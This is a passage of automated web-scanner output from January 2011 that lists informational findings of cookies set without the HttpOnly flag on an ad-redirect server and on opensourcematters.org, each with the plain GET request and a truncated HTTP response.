Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:23:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:26:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:32:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.523. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:20:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.527. http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc17c.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc17c.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy

Response

14.528. http://opensourcematters.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://opensourcematters.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1f72ba4da1bac63277a9607bcca06e80=5576152988b79363ffc0a34c946e44b9; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.529. http://opensourcematters.org/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://opensourcematters.org
Path:	/contact.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1f72ba4da1bac63277a9607bcca06e80=d2d8c73a1667c7bf1a7b8a5be9bb382a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.html HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=d2d8c73a1667c7bf1a7b8a5be9bb382a; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 7725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.530. http://opensourcematters.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://opensourcematters.org
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1f72ba4da1bac63277a9607bcca06e80=78e39bdbad81bd41991ff68e380b3c74; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.531. http://opensourcematters.org/register-your-group.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://opensourcematters.org
Path:	/register-your-group.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1f72ba4da1bac63277a9607bcca06e80=8003f7552ba6924d0dd091b0cd1df613; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /register-your-group.html HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Component not found
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=8003f7552ba6924d0dd091b0cd1df613; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.532. http://opensourcematters.org/support-joomla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://opensourcematters.org
Path:	/support-joomla.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1f72ba4da1bac63277a9607bcca06e80=24aa78d1150500c038af95a02f90a621; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support-joomla.html HTTP/1.1
Host: opensourcematters.org
